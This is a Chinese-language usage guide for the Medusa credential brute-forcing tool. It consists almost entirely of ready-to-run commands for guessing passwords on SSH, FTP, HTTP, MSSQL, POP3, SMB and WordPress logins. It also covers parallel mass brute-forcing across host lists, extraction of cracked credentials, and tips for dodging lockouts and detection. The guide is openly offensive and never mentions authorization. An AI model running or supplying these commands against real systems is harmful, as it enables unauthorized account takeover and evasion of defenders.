Medusa 使用指南:基础与进阶方法
一、基础使用方法
1. 基本命令结构
medusa -h [目标IP] -u [用户名] -P [密码字典] -M [协议模块] [选项]
2. 最常用参数组合
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh -t 4 -T 4 -f -e ns -v 3
-t 4
:同时测试4台主机-T 4
:每台主机4个线程-f
:发现有效凭证后停止-e ns
:检查空密码和密码=用户名的情况-v 3
:中等详细输出
3. 常用协议破解示例
SSH破解
medusa -h 10.0.0.5 -u root -P /usr/share/wordlists/rockyou.txt -M ssh
FTP破解
medusa -H hosts.txt -U common_users.txt -P top_passwords.txt -M ftp -n 2121
HTTP基础认证
medusa -h www.target.com -u admin -P passwords.txt -M http -m DIR:/admin
二、进阶使用方法
1. 组合攻击技术
用户名密码组合文件
medusa -H targets.txt -C user_pass_combos.txt -M smbnt
user_pass_combos.txt
格式:
username1:password1
username2:password2
多条件组合
medusa -h 192.168.1.100 -U users.txt -P "Summer2023,Winter2023,Spring2023" -M mssql -e ns -r 1
-r 1
:失败后1秒重试- 直接指定多个密码尝试
2. 高级参数配置
超时控制
medusa -h mail.server.com -u user -P passlist.txt -M pop3 -s -w 3
-w 3
:响应超时设为3秒
端口扫描+爆破组合
# 先用nmap扫描开放服务
nmap -p 21,22,80,3306 192.168.1.100
# 根据结果针对性爆破
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ftp,ssh,http,mysql -T 8
3. 特殊模块使用
WordPress后台爆破
medusa -h blog.example.com -U wp_users.txt -P wp_passwords.txt -M http -m FORM:"wp-login.php" -m DENY-SIGNAL:"login_error" -m FORM-DATA:"post?log=^USER^&pwd=^PASS^" -e ns
数据库特定破解
medusa -h db.server.com -u sa -P sql_pass.txt -M mssql -m DB:"master" -n 1433
4. 性能优化技巧
大规模分布式爆破
# 分割字典文件后并行执行
split -l 10000 big_passwords.txt pass_part_
for part in pass_part_*; do
medusa -H targets.txt -U users.txt -P $part -M ssh -T 8 -o results_$part.log &
done
结果筛选与分析
# 提取成功的尝试
grep "ACCOUNT FOUND" medusa_results.log | awk '{print $4,$6}' > valid_creds.txt
# 统计成功率
grep -c "ACCOUNT FOUND" medusa_results.log
三、实用技巧
-
字典优化:
- 优先尝试常见密码组合:
-e ns
(空密码和密码=用户名) - 使用目标相关的密码(如公司名+年份)
- 优先尝试常见密码组合:
-
规避检测:
- 使用
-r 2
增加重试间隔 - 通过
-T
控制并发量避免触发锁定机制
- 使用
-
结果管理:
- 使用
-O result.log
保存结果 - 结合
-f
发现有效凭证后立即停止
- 使用
-
协议特定技巧:
# SSH使用密钥爆破 medusa -h 192.168.1.100 -U users.txt -k /path/to/keyfile -M ssh # HTTP POST请求定制 medusa -h target.com -M http -m FORM:"login.php" -m FORM-DATA:"post?user=^USER^&pass=^PASS^"